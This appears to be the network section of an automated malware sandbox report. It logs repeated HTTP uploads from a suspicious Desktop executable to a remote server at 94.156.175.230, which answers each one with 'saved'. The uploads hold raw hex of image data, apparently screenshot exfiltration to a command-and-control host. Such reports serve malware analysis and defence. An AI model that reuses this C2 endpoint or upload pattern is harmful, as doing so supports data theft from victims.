                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:12.942431927 CEST2454OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:13.006963968 CEST2457OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:13.007024050 CEST2463OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:13.007041931 CEST2465OUTData Raw: 8a 62 16 8e d4 52 d0 02 52 f4 ad 1d 1b 46 ba d6 ef 96 d6 d5 49 76 20 70 32 72 7a 00 3d 6b b7 1f 05 fc 4f d7 c9 ff 00 c7 a3 ff 00 e2 eb 19 e2 69 42 5c b2 7a fa 37 f9 23 b2 96 5f 88 ab 4d 54 8a 49 3d af 28 c6 fe 97 6a e7 9b e2 80 2b d2 3f e1 4b f8
                                                                  Data Ascii: bRRFIv p2rz=kOiB\z7#_MTI=(j+?Kxu/YZUN+|T}vw?5YV%8GI42[J]N5t<FQE1A4%QHb)iq@RPZCK@KIQE/j((QKE0Z))(Z(
                                                                  May 28, 2021 13:00:13.007184029 CEST2468OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:13.007448912 CEST2481OUTData Raw: d9 dc 34 26 2b 3b 71 22 aa 8d bb 64 94 97 0d 1a b6 ee 0e d2 32 31 9c d6 6c 5e 21 d6 62 bf be bd fb 54 32 cd 7c e2 4b 95 9e d6 29 63 91 c1 c8 63 1b a9 5c 82 4e 08 19 19 38 eb 51 1d 67 54 36 b7 90 19 e2 26 f5 99 ae 27 36 d1 99 e4 dc 41 60 65 db bf
                                                                  Data Ascii: 4&+;q"d21l^!bT2|K)cc\N8QgT6&'6A`e@lunI#%SZZcr$ zU?C|vE$*$rg6q-_'o<w+"DyPeaST}.nZ,$8+sgi5<M
                                                                  May 28, 2021 13:00:13.071492910 CEST2484OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:13.071528912 CEST2487OUTData Raw: 50 9d 39 a6 cf 23 a2 8a 75 79 07 d2 96 ff 00 b2 35 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a fa 4e cf 46 d0 8e 9b 69 2c f6 33 bc 8f 12 17 64 f3 4e 49 50 49 e0 7b ff 00 9c 56 6e ab 79 e0 fd 1f 52 96 c6 e3 4b bf 79
                                                                  Data Ascii: P9#uy5?]??]NFi,3dNIPI{VnyRKyb_CqZ_,#voR:Kr>~w~(w~+|::?o~4V$Un[zzq,T,'v|:7UiaZ)x^ASI51
                                                                  May 28, 2021 13:00:13.071541071 CEST2489OUTData Raw: fc 79 a9 49 ab fc 18 b5 bd 98 e6 59 26 8d 5c fa b2 b3 29 3f 89 19 af 0a 35 ee 9e 3d d3 64 d2 3e 0c 5a d9 4c 31 2a 4d 19 71 e8 cc cc c4 7e 04 e2 bc 2a aa 8f 2d e7 c9 b5 dd 85 53 9b 96 1c fb d9 5c 5a 29 29 6b 63 20 ed 45 2f 6a 43 40 82 81 45 28 a0
                                                                  Data Ascii: yIY&\)?5=d>ZL1*Mq~*-S\Z))kc E/jC@E(%-0KH(BIGz`(J(&::2X)b(Lp,pD))i2SD)HRZpL.i3J)}(MNhiQ>8&n8Sd5I\4
                                                                  May 28, 2021 13:00:13.071547031 CEST2492OUTData Raw: 2c 3a 8d 9d f4 72 26 f1 2d a9 7c 0e 48 c1 0e aa c0 f1 dc 74 22 b5 4e a9 a6 cd aa 6b 16 0d 74 63 d2 ee 6c 93 4f b5 ba 11 36 d8 c4 6e 8c 8e ca 06 ed ac c8 4b 70 4f ce 4e 09 e2 b4 62 d7 34 9b 5b 8b 78 6d f5 0b 1b 6d 45 74 a7 b7 1a cd 95 93 45 14 53
                                                                  Data Ascii: ,:r&-|Ht"NktclO6nKpONb4[xmmEtESw+acWyeni{iwo?e4:x'vUbqc;eg6im]DpyiM58M@sO4VBH872U@x7WuZhO-0Q0U}0sJZ
                                                                  May 28, 2021 13:00:13.208569050 CEST2555INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.34976094.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:05.060110092 CEST1308OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 cb a7 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:05.124461889 CEST1311OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:05.124538898 CEST1313OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:05.124558926 CEST1316OUTData Raw: df fa bd ff 00 af f8 25 2a d1 da df d5 ac 68 cf a2 6a 36 b6 8f 75 35 b1 48 11 20 76 6d ea 70 26 52 d1 9c 03 9e 40 27 db be 2a 85 34 44 a0 e4 66 9f 5d 0a fd 4e 77 6e 83 4f 43 5d dc 96 9a 0d b5 bd cc 7f d8 11 cb 2d a6 83 6d a9 f9 af 75 37 ef 65 71
                                                                  Data Ascii: %*hj6u5H vmp&R@'*4Df]NwnOC]-mu7eqe`GQ)QR2]%y+:ZK[n^<ddGyRuh7Rm2{MfX;(XTndq>JzRtwxc&TzPKwHK)7n/o@Wv0
                                                                  May 28, 2021 13:00:05.124571085 CEST1319OUTData Raw: 8a 62 16 8e d4 52 d0 02 52 f4 ad 1d 1b 46 ba d6 ef 96 d6 d5 49 76 20 70 32 72 7a 00 3d 6b b7 1f 05 fc 4f d7 c9 ff 00 c7 a3 ff 00 e2 eb 19 e2 69 42 5c b2 7a fa 37 f9 23 b2 96 5f 88 ab 4d 54 8a 49 3d af 28 c6 fe 97 6a e7 9b e2 80 2b d2 3f e1 4b f8
                                                                  Data Ascii: bRRFIv p2rz=kOiB\z7#_MTI=(j+?Kxu/YZUN+|T}vw?5YV%8GI42[J]N5t<FQE1A4%Y<fe<xF\2O/]~k5_$V^4z-*
                                                                  May 28, 2021 13:00:05.125287056 CEST1321OUTData Raw: 3d 2b 3f c5 c0 8f 86 fa e9 23 ad 83 91 ff 00 7e 85 3f 59 b3 b8 d5 3c 0d 75 69 6b fb cb 89 76 85 ca 08 b2 44 80 f2 3a 03 c5 3f c6 6a 53 e1 be b2 8c 30 cb a7 38 3f f7 c5 7b 91 b7 24 75 d6 ff 00 e4 73 46 f7 b5 b4 b2 fd 4f 92 fb d2 d2 77 a5 af 40 e5
                                                                  Data Ascii: =+?#~?Y<uikvD:?jS08?{$usFOw@({u_}/X>jW~,7>4;?s"A}mu,Nwk;?Z?+(h j~wKw<_igzWN!DY{
                                                                  May 28, 2021 13:00:05.125329971 CEST1335OUTData Raw: 69 a5 6a d1 4a 63 25 66 e0 68 a6 55 22 9a 56 a7 2b 4c 2b 59 b8 9a 29 10 11 4d 22 a7 2b eb 4c 2b 50 d1 6a 44 54 94 f2 29 31 51 62 86 51 8a 71 14 84 52 28 6d 14 b8 a3 14 58 04 a2 97 14 62 90 c4 a4 a7 62 8c 53 b0 8a 75 d8 78 46 c6 c7 51 f0 ee bb 6b
                                                                  Data Ascii: ijJc%fhU"V+L+Y)M"+L+PjDT)1QbQqR(mXbbSuxFQkuo\\Mkmi;&)uE>*wpRy#Ednscst=%(4NI)][Zoo.`Ol\$e[6S\i\__bI-Bv2w],7q^#i
                                                                  May 28, 2021 13:00:05.189567089 CEST1337OUTData Raw: 0a 78 89 07 57 34 b9 91 3c e5 43 6e bf 4a 3e cf e8 45 5f 55 84 1e 55 8d 4c 92 44 a7 e5 b7 4f c6 a1 cd f4 42 f6 9e 66 62 da b1 e8 b9 fa 55 a8 b4 bb 99 58 08 e0 76 3f ee d6 82 5f 3a 7d c4 45 1f 4a d6 d3 ef 2e 1e 45 f9 b1 ec 05 73 d5 af 52 2a e9 1b
                                                                  Data Ascii: xW4<CnJ>E_UULDOBfbUXv?_:}EJ.EsR*P>Vjk:ysD#7s^+*MF+/C0rr=7"jz=~L8]\S +q_Ru'.y=X1$V;cBuOE
                                                                  May 28, 2021 13:00:05.189616919 CEST1340OUTData Raw: fb d0 3f e5 5b 11 f8 92 f5 3a 95 61 ef 56 e3 f1 4b 74 96 15 34 7b 5c 4c 77 8a 63 51 c2 4b 69 34 72 c6 19 17 ac 6c 3f 0a 6e 08 ae c9 75 eb 19 78 92 dd 79 f6 a9 3c ed 16 7f bf 0a 8f c2 97 d6 ea 2f 8a 05 ac 1d 39 7c 15 11 c5 0c d3 85 76 67 4a d1 27
                                                                  Data Ascii: ?[:aVKt4{\LwcQKi4rl?nuxy</9|vgJ'+S,dG%~Ltvw4Ep!g8K4ujLkuU{_Lp+5TS~g}Ovr]R?G+"}sFdTQ7vE4
                                                                  May 28, 2021 13:00:05.189630985 CEST1343OUTData Raw: 6d ff 00 f6 9c 75 f3 75 7d 23 f0 7f fe 44 9f fb 6f ff 00 b4 e3 af 3f 1d f1 43 e6 7a d9 77 f0 2b 7f db bf 99 d7 ea da d5 8e 8d 6a f3 5d ce 8a c1 0b 24 7b be 67 c7 60 3f 4a e4 74 1b bd 53 44 b6 9a e2 e3 47 ba f2 6e 58 cf 73 2c a0 26 c9 58 f2 70 32
                                                                  Data Ascii: muu}#Do?Czw+j]${g`?JtSDGnXs,&Xp21c=Z(sg,'9s=-FW?5_%UumJt(m>>Wq{%{tqE.4M-@!{?%%8s;bNJUI(x
                                                                  May 28, 2021 13:00:05.322043896 CEST1405INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.34995294.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:05.650676012 CEST1419OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:05.714939117 CEST1422OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:05.714968920 CEST1427OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:05.714982033 CEST1430OUTData Raw: 8a 62 16 8e d4 52 d0 02 52 f4 ad 1d 1b 46 ba d6 ef 96 d6 d5 49 76 20 70 32 72 7a 00 3d 6b b7 1f 05 fc 4f d7 c9 ff 00 c7 a3 ff 00 e2 eb 19 e2 69 42 5c b2 7a fa 37 f9 23 b2 96 5f 88 ab 4d 54 8a 49 3d af 28 c6 fe 97 6a e7 9b e2 80 2b d2 3f e1 4b f8
                                                                  Data Ascii: bRRFIv p2rz=kOiB\z7#_MTI=(j+?Kxu/YZUN+|T}vw?5YV%8GI42[J]N5t<FQE1A4%QHb)iq@RPZCK@KIQE/j((QKE0Z))(Z(
                                                                  May 28, 2021 13:00:05.715004921 CEST1432OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:05.715059996 CEST1437OUTData Raw: d9 dc 34 26 2b 3b 71 22 aa 8d bb 64 94 97 0d 1a b6 ee 0e d2 32 31 9c d6 6c 5e 21 d6 62 bf be bd fb 54 32 cd 7c e2 4b 95 9e d6 29 63 91 c1 c8 63 1b a9 5c 82 4e 08 19 19 38 eb 51 1d 67 54 36 b7 90 19 e2 26 f5 99 ae 27 36 d1 99 e4 dc 41 60 65 db bf
                                                                  Data Ascii: 4&+;q"d21l^!bT2|K)cc\N8QgT6&'6A`e@lunI#%SZZcr$ zU?C|vE$*$rg6q-_'o<w+"DyPeaST}.nZ,$8+sgi5<M
                                                                  May 28, 2021 13:00:05.715204000 CEST1440OUTData Raw: 3f 91 ae ff 00 d0 47 4e ff 00 c0 07 ff 00 e3 d5 0d c6 9f aa dd c7 e5 5c dd e9 72 c7 9c ed 7d 39 c8 cf fd fe ae 6e 45 fc cb f1 ff 00 23 a3 9d ff 00 2b fc 3f cc f0 4f 1e f8 1e 6f 0b dd b5 d5 ae e9 34 c9 1b e5 6e f1 93 fc 27 fa 1a e3 04 ac 3b 9a f7
                                                                  Data Ascii: ?GN\r}9nE#+?Oo4n';}B;;h';0p&in2"vz<UAt3=TRT[-j>t5Tv:SOt.Y-1CO=J;Z)GNia5l\g=DfdiXuV
                                                                  May 28, 2021 13:00:05.715254068 CEST1443OUTData Raw: 4e 6b 2c 31 a7 89 2b 39 53 4c 4b 9a 3b 33 a2 82 fd 1f 86 23 f1 ab aa b6 b3 0c bc 6a 7e 95 ca 2c b5 62 2b 99 41 f9 37 1f a5 72 d4 c3 f5 4e c7 55 3c 53 5a 4d 5c ea 53 4c b5 7f f5 67 6f b5 48 34 72 47 40 c2 b1 6d ef 2e c7 fc b2 6c 7a 9e 2b 5a df 52
                                                                  Data Ascii: Nk,1+9SLK;3#j~,b+A7rNU<SZM\SLgoH4rG@m.lz+ZRt|jfz4jal+~9Gex5IdzWQ>iU5uu9@>jWXc`:,kVqRUw6jB%S:KzWGLy+ky
                                                                  May 28, 2021 13:00:05.715279102 CEST1446OUTData Raw: ab 6a d7 7f c2 ef 5f ba df 71 d2 9d 2d 13 fe bf af d4 9a 4d 1f 4d b0 b6 37 b7 f2 dd 34 36 f6 f6 de 7c 11 32 ac 92 5c 4e 8d 22 a2 b1 04 22 84 00 92 43 1c 8c 63 9e 2b c3 06 8f 24 17 9a bc 8b 7f 1e 99 6e d1 c4 b6 be 6a 34 f2 4a e1 88 51 26 d0 02 e1
                                                                  Data Ascii: j_q-MM746|2\N""Cc+$nj4JQ&l=iVP4?O5sxsi%yR05ZI-nY;dYvm703;}yoKZh4op]d(f_OfCDQu lHTHY2;
                                                                  May 28, 2021 13:00:05.781160116 CEST1449OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:05.910505056 CEST1516INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.34995494.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:06.279536963 CEST1536OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:06.344029903 CEST1543OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
                                                                  May 28, 2021 13:00:06.344094992 CEST1546OUTData Raw: 00 e8 62 b2 cd 5c d2 ec 75 3b fb d5 4d 26 d2 f2 e6 ea 21 e6 81 69 13 3b a6 08 f9 be 51 91 83 8e 7e 94 3d 81 6e 7d 11 af 78 76 ff 00 c4 de 3f 9a d2 f6 69 61 d3 a1 b7 12 40 ca 32 08 c0 07 6f 6c ee 3c fb 01 ed 5c 8f c5 b9 9f 41 5f 0d d9 32 89 8c 56
                                                                  Data Ascii: b\u;M&!i;Q~=n}xv?ia@2ol<\A_2VF&l;v>#R`3yNEP6go!}+M%-sqifk7E`-CPi'VEMJTZ'XhceW)*O@N>:f43au~]*I;7_7j6
                                                                  May 28, 2021 13:00:06.344121933 CEST1551OUTData Raw: df fa bd ff 00 af f8 25 2a d1 da df d5 ac 68 cf a2 6a 36 b6 8f 75 35 b1 48 11 20 76 6d ea 70 26 52 d1 9c 03 9e 40 27 db be 2a 85 34 44 a0 e4 66 9f 5d 0a fd 4e 77 6e 83 4f 43 5d dc 96 9a 0d b5 bd cc 7f d8 11 cb 2d a6 83 6d a9 f9 af 75 37 ef 65 71
                                                                  Data Ascii: %*hj6u5H vmp&R@'*4Df]NwnOC]-mu7eqe`GQ)QR2]%y+:ZK[n^<ddGyRuh7Rm2{MfX;(XTndq>JzRtwxc&TzPKwHK)7n/o@Wv0
                                                                  May 28, 2021 13:00:06.344136953 CEST1554OUTData Raw: f8 52 8f 0e eb aa c1 86 8f a9 02 0e 41 16 af c7 e9 5e fb a1 87 74 bd 9d d7 7f 99 f3 ca be 21 55 f6 96 7d be 47 a5 78 7b c4 eb e2 18 b4 45 9d 80 bf b7 bc 2b 32 f4 dd fe 8f 36 18 7d 7b fb fe 15 e4 9f 1a ff 00 e4 a2 cd ff 00 5e d1 7f 2a ed 3c 19 a4
                                                                  Data Ascii: RA^t!U}Gx{E+26}{^*<xL3#I,02O\W(_|M8S%Ok~0'SM#(\PRLG`grYA($2{;CrWzV}~o-T38nD
                                                                  May 28, 2021 13:00:06.344156981 CEST1556OUTData Raw: d9 dc 34 26 2b 3b 71 22 aa 8d bb 64 94 97 0d 1a b6 ee 0e d2 32 31 9c d6 6c 5e 21 d6 62 bf be bd fb 54 32 cd 7c e2 4b 95 9e d6 29 63 91 c1 c8 63 1b a9 5c 82 4e 08 19 19 38 eb 51 1d 67 54 36 b7 90 19 e2 26 f5 99 ae 27 36 d1 99 e4 dc 41 60 65 db bf
                                                                  Data Ascii: 4&+;q"d21l^!bT2|K)cc\N8QgT6&'6A`e@lunI#%SZZcr$ zU?C|vE$*$rg6q-_'o<w+"DyPeaST}.nZ,$8+sgi5<M
                                                                  May 28, 2021 13:00:06.344208956 CEST1562OUTData Raw: 88 46 85 f6 41 99 18 12 42 91 92 ab 8e b8 3d 2b ce c8 c8 c5 68 dc 78 83 5e bb 68 1e e7 5e d5 27 6b 77 f3 20 69 2e e4 63 13 7f 79 49 3c 1f 71 59 55 8c a4 d3 8f 4b fe 36 fc 8d 69 ca 29 34 ce aa f6 d3 4d ba d0 f4 7b e7 b7 d4 97 4e b3 d1 65 bb 16 be
                                                                  Data Ascii: FAB=+hx^h^'kw i.cyI<qYUK6i)4M{NebP<v<H|+Y/n.x,e2Hq`?xwltuG\8cRhfM'29UcwwI,i{"E,pV*5S}6\4Q[|VFXWz`
                                                                  May 28, 2021 13:00:06.344249010 CEST1567OUTData Raw: 4e 6b 2c 31 a7 89 2b 39 53 4c 4b 9a 3b 33 a2 82 fd 1f 86 23 f1 ab aa b6 b3 0c bc 6a 7e 95 ca 2c b5 62 2b 99 41 f9 37 1f a5 72 d4 c3 f5 4e c7 55 3c 53 5a 4d 5c ea 53 4c b5 7f f5 67 6f b5 48 34 72 47 40 c2 b1 6d ef 2e c7 fc b2 6c 7a 9e 2b 5a df 52
                                                                  Data Ascii: Nk,1+9SLK;3#j~,b+A7rNU<SZM\SLgoH4rG@m.lz+ZRt|jfz4jal+~9Gex5IdzWQ>iU5uu9@>jWXc`:,kVqRUw6jB%S:KzWGLy+ky
                                                                  May 28, 2021 13:00:06.411847115 CEST1580OUTData Raw: fe d4 8e c1 6d d6 67 66 b5 32 93 e5 f9 84 a9 e0 e0 f2 0b 11 d0 e0 f1 58 37 fa ec da 95 b3 8b ad 2f 4e 92 f9 d0 23 ea 1b 5c 4c e0 77 20 3f 96 5b 1c 6e d9 9e f9 cf 35 2a f8 ab 55 4d 56 f3 51 58 6c fc fb bd 46 0d 46 40 51 b6 89 22 2c 54 0f 9b ee 92
                                                                  Data Ascii: mgf2X7/N#\Lw ?[n5*UMVQXlFF@Q",T#9jKMi|'$kR;ww-m#,wuok''iaf2tRn<$)!tpMm`S>Q\5(dIcmqlu[[cZM
                                                                  May 28, 2021 13:00:06.411993027 CEST1583OUTData Raw: 96 8f 20 fc d4 11 53 2e a9 6b ae 41 14 da 35 cd bd d3 43 2e f6 43 21 42 01 56 5e 78 24 75 f4 a5 27 88 8a e6 92 69 7a 0a 2f 0f 29 72 c5 a6 fd 4f 90 ef ad ae f4 db d9 6c ef 22 78 6e 22 6d ae 8c 39 06 ab f9 ad eb 5e ed f1 9b c3 cb 27 87 5b 5c ba b2
                                                                  Data Ascii: S.kA5C.C!BV^x$u'iz/)rOl"xn"m9^'[\]#YapadusW35bO5[WvM5hZ(5hIadK7szY9Q h4s0Dhapi}P(cEr\'%7joz@A]5V
                                                                  May 28, 2021 13:00:06.540668011 CEST1636INData Raw: 73 61 76 65 64
                                                                  Data Ascii: saved


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.34995594.156.175.23080C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 28, 2021 13:00:06.893579006 CEST1650OUTData Raw: 73 62 79 63 49 43 4b 48 57 77 61 36 44 33 6b 70 49 52 71 53 61 36 58 34 2f 30 30 30 30 70 c5 a5 01 00 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12
                                                                  Data Ascii: sbycICKHWwa6D3kpIRqSa6X4/0000pJFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"
                                                                  May 28, 2021 13:00:06.958209991 CEST1653OUTData Raw: b2 14 6f bf d7 38 f5 e9 9f c6 aa 6a 16 13 a5 c4 92 db c4 c6 1e 24 f9 5c ee 56 c9 dc 40 eb dc 1c 0f 43 f4 a9 34 8d 3e 68 a7 59 e6 8d 51 36 0f 2d 4b 92 ca 7d c7 63 83 83 d7 f9 d0 07 c9 3a cf fc 87 75 0f fa f9 93 ff 00 42 35 4a ae 6b 3f f2 1c d4 3f
                                                                  Data Ascii: o8j$\V@C4>hYQ6-K}c:uB5Jk??O:#8EsT!h4uCGjb@4h042KV<v`3i\,tZ?aFCZ8+WuCg8U7=T<QI.+j?n6'
